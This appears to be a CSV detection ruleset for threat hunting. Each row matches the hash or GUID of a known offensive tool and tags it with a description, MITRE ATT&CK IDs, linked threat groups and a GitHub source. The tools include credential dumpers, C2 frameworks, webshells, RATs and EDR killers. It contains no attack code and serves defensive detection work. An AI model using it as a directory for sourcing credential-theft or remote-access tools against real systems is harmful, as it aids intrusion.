"*c749894ea43c267418df93c7dd6b74ef25826d6c4a5461226ec800ae2efd1921*",".{0,1000}c749894ea43c267418df93c7dd6b74ef25826d6c4a5461226ec800ae2efd1921.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","37200"
"*c74ba7419eb8528b153e3cb208fd06d0012884b1528fa4152aa7ee034d956a63*",".{0,1000}c74ba7419eb8528b153e3cb208fd06d0012884b1528fa4152aa7ee034d956a63.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37201"
"*c74f294042ccfc39dec052d9871e6bbd4e69b019a353f6e02947303adeac3794*",".{0,1000}c74f294042ccfc39dec052d9871e6bbd4e69b019a353f6e02947303adeac3794.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37202"
"*c75531e87d48c7411c2af2775fa62f4e0ef5b71103ef88cbbbbb544ed76279f8*",".{0,1000}c75531e87d48c7411c2af2775fa62f4e0ef5b71103ef88cbbbbb544ed76279f8.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","37203"
"*c7600f446daa53037a63ad765e0873a9c45adfd8944e5fee1c1586936ecf2928*",".{0,1000}c7600f446daa53037a63ad765e0873a9c45adfd8944e5fee1c1586936ecf2928.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","37205"
"*c768f3bc74ea36d42f2420d6cd47a8d997dddde569e774c9232ca68ff10c9a63*",".{0,1000}c768f3bc74ea36d42f2420d6cd47a8d997dddde569e774c9232ca68ff10c9a63.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37209"
"*c76b2b12624877a95f172da43a31f7946c13c6bda3b792610411f7c709c8069b*",".{0,1000}c76b2b12624877a95f172da43a31f7946c13c6bda3b792610411f7c709c8069b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37210"
"*c77c84a7ec144daa151410334db7f90855c8406c5d205d9c68082902018ac2cd*",".{0,1000}c77c84a7ec144daa151410334db7f90855c8406c5d205d9c68082902018ac2cd.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37211"
"*c786890a660e4bca317ce667bc660504f8167a5d5965867d748ed02d0caa5046*",".{0,1000}c786890a660e4bca317ce667bc660504f8167a5d5965867d748ed02d0caa5046.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","37212"
"*c7874c257949a3c09dcb16f17c6fdb5ea0c5adb143004e7cc4adc63eb3ed785c*",".{0,1000}c7874c257949a3c09dcb16f17c6fdb5ea0c5adb143004e7cc4adc63eb3ed785c.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","37213"
"*c787d2dcdb5ea2184d90206ffd7da618a71d51383888b3d8564a9c71e7f100c4*",".{0,1000}c787d2dcdb5ea2184d90206ffd7da618a71d51383888b3d8564a9c71e7f100c4.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37214"
"*c7895e40feadeded96faf3a9c5fb0423bc16c5005aa419771c70849e9679e807*",".{0,1000}c7895e40feadeded96faf3a9c5fb0423bc16c5005aa419771c70849e9679e807.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","37215"
"*c78a157fbea4f59374fa0b274ab267549a664023443da600524146a13eb8b214*",".{0,1000}c78a157fbea4f59374fa0b274ab267549a664023443da600524146a13eb8b214.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37216"
"*c794d9b0bef6c7d8838f5130e2e0ae4c8bed3ec35cfb9bf502520dcfab38bde2*",".{0,1000}c794d9b0bef6c7d8838f5130e2e0ae4c8bed3ec35cfb9bf502520dcfab38bde2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37219"
"*c7985c82769ce2d6d68e3ed3926df1bc47523990c56cfa1ebe3e511e4b96a903*",".{0,1000}c7985c82769ce2d6d68e3ed3926df1bc47523990c56cfa1ebe3e511e4b96a903.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","37220"
"*c79e051bb46302d29235045e7ce05e9806e52f7fdc0249a9593cd8fa01e11c35*",".{0,1000}c79e051bb46302d29235045e7ce05e9806e52f7fdc0249a9593cd8fa01e11c35.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","37222"
"*C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4*",".{0,1000}C7A0003B\-98DC\-4D57\-8F09\-5B90AAEFBDF4.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#GUIDproject","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","37223"
"*C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4*",".{0,1000}C7A0003B\-98DC\-4D57\-8F09\-5B90AAEFBDF4.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#GUIDproject","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","37224"
"*C7A5E6480C6CEC01E3627AE0A8EAC1FFE13226C560D4E4C05FCE1CAB1168CC8D*",".{0,1000}C7A5E6480C6CEC01E3627AE0A8EAC1FFE13226C560D4E4C05FCE1CAB1168CC8D.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37225"
"*c7afaf55e64fcbcae026383afb4f2576317dc3288fbda8652506e28fe71f10dc*",".{0,1000}c7afaf55e64fcbcae026383afb4f2576317dc3288fbda8652506e28fe71f10dc.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37227"
"*c7b633d9ffcddd84074219649dae082184e2331c07b395db5e2ffa9abe316355*",".{0,1000}c7b633d9ffcddd84074219649dae082184e2331c07b395db5e2ffa9abe316355.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","37229"
"*c7b76c0c337dcc31eeef08d0ae74254b810f5e0aac54a9ff06c6f87cef8a1436*",".{0,1000}c7b76c0c337dcc31eeef08d0ae74254b810f5e0aac54a9ff06c6f87cef8a1436.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37230"
"*c7bac4df389bcfe3073fefde8fea9fc0d1057fbda2a329ad29a1566f9ded6d8d*",".{0,1000}c7bac4df389bcfe3073fefde8fea9fc0d1057fbda2a329ad29a1566f9ded6d8d.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","37231"
"*c7bbfa266cc73f87a47186afadea101ceb03f759cf4b927a25dd1004d56ea07e*",".{0,1000}c7bbfa266cc73f87a47186afadea101ceb03f759cf4b927a25dd1004d56ea07e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37232"
"*c7bdcebe60356900dc4b4f8bc8b75acc1536df33ae7a1049bfa27192b8c62d0a*",".{0,1000}c7bdcebe60356900dc4b4f8bc8b75acc1536df33ae7a1049bfa27192b8c62d0a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37233"
"*c7c0c7e68bcc0ce7fbb15505434740e0528ab1240eeb8c3a123c3d84b8f6eefa*",".{0,1000}c7c0c7e68bcc0ce7fbb15505434740e0528ab1240eeb8c3a123c3d84b8f6eefa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37235"
"*c7c2b1295dbc6b5b13330310465c771108fdeff7e7b37447bc449f6c535cfa62*",".{0,1000}c7c2b1295dbc6b5b13330310465c771108fdeff7e7b37447bc449f6c535cfa62.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","37236"
"*c7c8b6fb-4e59-494e-aeeb-40cf342a7e88*",".{0,1000}c7c8b6fb\-4e59\-494e\-aeeb\-40cf342a7e88.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","#GUIDproject","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","37238"
"*c7d0e470542ece3342535057e01e84b962b19959e5142aa61633f49ebaa52775*",".{0,1000}c7d0e470542ece3342535057e01e84b962b19959e5142aa61633f49ebaa52775.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37239"
"*c7d3092d358e4828259d3b137eec1edeab112e2a70920c5912c76724e956ba47*",".{0,1000}c7d3092d358e4828259d3b137eec1edeab112e2a70920c5912c76724e956ba47.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37240"
"*c7d41f5a0fe15661632d70cde6b34787f87e4818d7c592ffa0c5b074fdb15712*",".{0,1000}c7d41f5a0fe15661632d70cde6b34787f87e4818d7c592ffa0c5b074fdb15712.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","37241"
"*c7d4de4e194b708aab0871da2661efd18074a9899a6ea784a4c7695ea5ae3c88*",".{0,1000}c7d4de4e194b708aab0871da2661efd18074a9899a6ea784a4c7695ea5ae3c88.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37242"
"*c7e3c249f4c41a4abcb5135a08c2e18b2db67843b9b5d0b023f84b60b9403207*",".{0,1000}c7e3c249f4c41a4abcb5135a08c2e18b2db67843b9b5d0b023f84b60b9403207.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37246"
"*C7E4B529-6372-449A-9184-74E74E432FE8*",".{0,1000}C7E4B529\-6372\-449A\-9184\-74E74E432FE8.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","#GUIDproject","N/A","9","","N/A","","","","37247"
"*c7eb26b422e1aa10706906aedb442dcc80a5b078e9e83f814f945bb46503a1f4*",".{0,1000}c7eb26b422e1aa10706906aedb442dcc80a5b078e9e83f814f945bb46503a1f4.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","37249"
"*c7ef467eeb99aa4aae717d0e258019ab5b7e176da4906a135d86e78faa9251cc*",".{0,1000}c7ef467eeb99aa4aae717d0e258019ab5b7e176da4906a135d86e78faa9251cc.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37250"
"*C7F1F871-8045-4414-9DC3-20F8AA42B4A1*",".{0,1000}C7F1F871\-8045\-4414\-9DC3\-20F8AA42B4A1.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","37252"
"*c7f3651ef551ed09c01349a493760935c2e22c36934e7604dbf4d61e2f0797e8*",".{0,1000}c7f3651ef551ed09c01349a493760935c2e22c36934e7604dbf4d61e2f0797e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37253"
"*c7f3f560c94164a7ed168b1ea7c5edf9e0cda3a9fe1a7e3918c1de6378444869*",".{0,1000}c7f3f560c94164a7ed168b1ea7c5edf9e0cda3a9fe1a7e3918c1de6378444869.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","37254"
"*c7fa65795c3627674274f83ccab5776c80922708787a2121ac4d5cfd02551fc4*",".{0,1000}c7fa65795c3627674274f83ccab5776c80922708787a2121ac4d5cfd02551fc4.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","37255"
"*c7fe63930a8f7983a9c2989ce91628bf852349d77842bfbd5d77543c47a7dd74*",".{0,1000}c7fe63930a8f7983a9c2989ce91628bf852349d77842bfbd5d77543c47a7dd74.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37256"
"*c7ff56000d015b06e6767e9bd7f2164e3876011d98ccd242c9d98dc11036d96a*",".{0,1000}c7ff56000d015b06e6767e9bd7f2164e3876011d98ccd242c9d98dc11036d96a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37257"
"*c7ffb81b3cd5cfcfe18363f998cd64428423814d5a8713d89e7992941884587d*",".{0,1000}c7ffb81b3cd5cfcfe18363f998cd64428423814d5a8713d89e7992941884587d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37258"
"*c80284ccc6e7c2dab2845923cf4eb2eb02b87292df93f65fd1c54ec726b537fc*",".{0,1000}c80284ccc6e7c2dab2845923cf4eb2eb02b87292df93f65fd1c54ec726b537fc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37259"
"*c804c43c43da61b4430b75946cff6c92443104eaaf8a7b31c6ec885159cd6ff7*",".{0,1000}c804c43c43da61b4430b75946cff6c92443104eaaf8a7b31c6ec885159cd6ff7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37260"
"*c80bf6d8d9a8c8f9671e8723922c89d8dd7263696f7708c0ace76ce66b947a7a*",".{0,1000}c80bf6d8d9a8c8f9671e8723922c89d8dd7263696f7708c0ace76ce66b947a7a.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","37262"
"*c80dcbdd89540bef5fa286f7c4614747479a60890a400367dd469bf5b3fa2618*",".{0,1000}c80dcbdd89540bef5fa286f7c4614747479a60890a400367dd469bf5b3fa2618.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37264"
